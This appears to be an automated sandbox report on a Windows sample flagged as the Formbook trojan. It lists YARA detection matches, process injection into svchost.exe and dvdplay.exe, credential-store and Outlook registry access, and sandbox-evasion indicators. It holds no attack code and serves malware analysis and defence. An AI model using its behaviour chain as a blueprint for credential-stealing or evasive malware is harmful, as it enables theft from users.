            Source: H1CYDJ8LQe.exe, 00000000.00000003.1680075472.0000000004693000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs H1CYDJ8LQe.exe
            Source: H1CYDJ8LQe.exe, 00000000.00000003.1680680234.000000000483D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs H1CYDJ8LQe.exe
            Source: H1CYDJ8LQe.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3527070490.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3527139921.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.3527390754.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1863781996.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1862646981.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3528921594.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@10/6
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0044AF6C GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | File created: C:\Users\user\AppData\Local\Temp\slashing
            Source: H1CYDJ8LQe.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: dvdplay.exe, 00000003.00000002.3526191845.0000000003181000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000003.2052355465.0000000003181000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: H1CYDJ8LQe.exe | ReversingLabs: Detection: 39%
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | File read: C:\Users\user\Desktop\H1CYDJ8LQe.exe
            Source: unknown | Process created: C:\Users\user\Desktop\H1CYDJ8LQe.exe "C:\Users\user\Desktop\H1CYDJ8LQe.exe"
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\H1CYDJ8LQe.exe"
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe | Process created: C:\Windows\SysWOW64\dvdplay.exe "C:\Windows\SysWOW64\dvdplay.exe"
            Source: C:\Windows\SysWOW64\dvdplay.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\dvdplay.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\dvdplay.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: H1CYDJ8LQe.exe | Static file information: File size 1517995 > 1048576
            Source: Binary string: dvdplay.pdbGCTL source: svchost.exe, 00000001.00000002.1862870444.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1862889809.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000002.00000002.3526788832.0000000001398000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SwTeWVAxKdsP.exe, 00000002.00000000.1764960932.00000000004BE000.00000002.00000001.01000000.00000004.sdmp, SwTeWVAxKdsP.exe, 00000007.00000002.3526375024.00000000004BE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: H1CYDJ8LQe.exe, 00000000.00000003.1678980011.0000000004710000.00000004.00001000.00020000.00000000.sdmp, H1CYDJ8LQe.exe, 00000000.00000003.1678801980.0000000004570000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863300462.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750211424.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863300462.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1748581643.0000000003000000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000003.1866640503.00000000031F8000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000003.1869028004.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527371899.0000000003560000.00000040.00001000.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527371899.00000000036FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: H1CYDJ8LQe.exe, 00000000.00000003.1678980011.0000000004710000.00000004.00001000.00020000.00000000.sdmp, H1CYDJ8LQe.exe, 00000000.00000003.1678801980.0000000004570000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1863300462.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750211424.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863300462.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1748581643.0000000003000000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, dvdplay.exe, 00000003.00000003.1866640503.00000000031F8000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000003.1869028004.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527371899.0000000003560000.00000040.00001000.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527371899.00000000036FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: dvdplay.pdb source: svchost.exe, 00000001.00000002.1862870444.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1862889809.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000002.00000002.3526788832.0000000001398000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: dvdplay.exe, 00000003.00000002.3526191845.00000000030FD000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527827023.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000000.1942597721.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2163541700.000000001D2EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: dvdplay.exe, 00000003.00000002.3526191845.00000000030FD000.00000004.00000020.00020000.00000000.sdmp, dvdplay.exe, 00000003.00000002.3527827023.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000000.1942597721.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2163541700.000000001D2EC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
            Source: H1CYDJ8LQe.exe Static PE information: real checksum: 0xa961f should be: 0x173b90
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_00462463 push edi; ret 0_2_00462465
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041184F push es; retf 1_2_0041185E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040D072 push 1F301B76h; ret 1_2_0040D07C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004250E3 push edi; ret 1_2_004250EE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041A967 push cs; iretd 1_2_0041A977
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040D1E0 push ebp; retf 1_2_0040D1F1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004019E4 push ebp; retf 1_2_004019E7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401A44 pushfd ; iretd 1_2_00401A58
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00414A65 push edx; retf 1_2_00414A66
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041F27F push ss; retf 1_2_0041F29A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041F218 push ss; retf 1_2_0041F29A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041ABD9 push edx; ret 1_2_0041ABDA
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00403380 push eax; ret 1_2_00403382
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042E673 push edi; retf 1_2_0042E679
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401ECA push ebp; retf 1_2_00401F40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401EA8 push ebp; retf 1_2_00401F40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041F6B6 push FFFFFF83h; iretd 1_2_0041F6BC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00405FBD pushfd ; iretd 1_2_00405FBF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0340225F pushad ; ret 1_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034027FA pushad ; ret 1_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034309AD push ecx; mov dword ptr [esp], ecx 1_2_034309B6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0340283D push eax; iretd 1_2_03402858
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0340135E push eax; iretd 1_2_03401369
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe Code function: 2_2_032A0B62 push edx; ret 2_2_032A0B63
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe Code function: 2_2_032A5208 push ss; retf 2_2_032A5223
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe Code function: 2_2_03293169 push ebp; retf 2_2_0329317A
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe Code function: 2_2_032A51A1 push ss; retf 2_2_032A5223
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe Code function: 2_2_0329A9EE push edx; retf 2_2_0329A9EF
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe Code function: 2_2_032AB06C push edi; ret 2_2_032AB077
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe Code function: 2_2_032A08F0 push cs; iretd 2_2_032A0900
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_0047A330
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\dvdplay.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe API/Special instruction interceptor: Address: 2E73244
            Source: C:\Windows\SysWOW64\dvdplay.exe API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\dvdplay.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\dvdplay.exe API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\dvdplay.exe API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\dvdplay.exe API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\dvdplay.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\dvdplay.exe API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\dvdplay.exe API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0347096E rdtsc 1_2_0347096E
            Source: C:\Windows\SysWOW64\dvdplay.exe Window / User API: threadDelayed 4226
            Source: C:\Windows\SysWOW64\dvdplay.exe Window / User API: threadDelayed 5747
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-85640
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe API coverage: 3.5 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\dvdplay.exe API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\dvdplay.exe TID: 4340 Thread sleep count: 4226 > 30
            Source: C:\Windows\SysWOW64\dvdplay.exe TID: 4340 Thread sleep time: -8452000s >= -30000s
            Source: C:\Windows\SysWOW64\dvdplay.exe TID: 4340 Thread sleep count: 5747 > 30
            Source: C:\Windows\SysWOW64\dvdplay.exe TID: 4340 Thread sleep time: -11494000s >= -30000s
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe TID: 6348 Thread sleep time: -55000s >= -30000s
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe TID: 6348 Thread sleep time: -36000s >= -30000s
            Source: C:\Windows\SysWOW64\dvdplay.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
            Source: C:\Windows\SysWOW64\dvdplay.exe Code function: 3_2_00B3C580 FindFirstFileW,FindNextFileW,FindClose, 3_2_00B3C580
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500
            Source: dvdplay.exe, 00000003.00000002.3526191845.00000000030FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
            Source: H1CYDJ8LQe.exe, 00000000.00000002.1681536047.000000000096E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: firefox.exe, 00000008.00000002.2165011209.000002731D35C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
